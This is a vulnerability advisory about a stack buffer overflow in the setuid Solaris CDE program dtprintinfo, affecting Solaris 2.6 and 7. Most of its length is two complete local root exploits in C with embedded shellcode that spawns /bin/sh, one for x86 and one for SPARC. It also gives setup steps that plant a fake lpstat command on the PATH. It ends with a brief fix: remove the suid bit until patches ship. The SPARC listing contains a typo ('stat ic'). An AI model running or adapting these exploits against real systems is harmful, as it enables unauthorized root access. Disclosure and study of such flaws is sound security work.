COMMAND
dtprintinfo
SYSTEMS AFFECTED
Solaris 2.6, 2.7 (x86 & sparc)
PROBLEM
'UNYUN@ShadowPenguin' found following. "dtprintinfo" is suid
program, the stack buffer can be overflowed by '-p' option. He
made an exploit program that can get root for Intel edition of
Solaris2.6 and Solaris7. If you test this program, please set
DISPLAY environment correctly before execution. Before execution
of dtprintinfo exploit, please make a dummy lpstat command. For
example:
% cat > lpstat
echo "system for lpprn: server.com"
^D
% chmod 755 lpstat
% setenv PATH .:$PATH
% gcc ex_dtprintinfo.c
% a.out
x86 exploit:
/*========================================================================
ex_dtprintinfo.c Overflow Exploits( for Intel x86 Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
========================================================================
*/
static char x[1000];
#define ADJUST 0
#define STARTADR 621
#define BUFSIZE 900
#define NOP 0x90
unsigned long ret_adr;
int i;
char exploit_code[] =
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33"
"\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88"
"\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f"
"\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46"
"\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01"
"\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";
unsigned long get_sp(void)
{
__asm__(" movl %esp,%eax ");
}
main()
{
putenv("LANG=");
for (i=0;i<BUFSIZE;i++) x[i]=NOP;
for (i=0;i<strlen(exploit_code);i++)
x[STARTADR+i]=exploit_code[i];
ret_adr=get_sp() - 1292 + 148;
for (i = ADJUST; i < 400 ; i+=4){
x[i+0]=ret_adr & 0xff;
x[i+1]=(ret_adr >> 8 ) &0xff;
x[i+2]=(ret_adr >> 16 ) &0xff;
x[i+3]=(ret_adr >> 24 ) &0xff;
}
x[BUFSIZE]=0;
execl("/usr/dt/bin/dtprintinfo", "dtprintinfo",
"-p",x,(char *) 0);
}
Following exploit program is for Sparc Solaris (tested on
Solaris2.6):
/*========================================================================
ex_dtprintinfo.c Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
=========================================================================
*/
#define ADJUST 0
#define OFFSET 1144
#define STARTADR 724
#define BUFSIZE 900
#define NOP 0xa61cc013
stat ic char x[1000];
unsigned long ret_adr;
int i;
char exploit_code[] =
"\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";
unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
main()
{
putenv("LANG=");
for (i = 0; i < ADJUST; i++) x[i]=0x11;
for (i = ADJUST; i < 900; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0;i<strlen(exploit_code);i++) x[STARTADR+i+ADJUST]=exploit_code[i];
ret_adr=get_sp()-OFFSET;
printf("jumping address : %lx\n",ret_adr);
if ((ret_adr & 0xff) ==0 ){
ret_adr -=16;
printf("New jumping address : %lx\n",ret_adr);
}
for (i = ADJUST; i < 600 ; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >> 8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
x[BUFSIZE]=0;
execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p",x,(char *) 0);
}
SOLUTION
Remove suid bit until patch gets out. This is Sun Bug# 4139394
which has been fixed in the current development release. Patches
for Solaris 2.6 and Solaris 7 (ie CDE 1.2 and CDE 1.3) are
currently in development.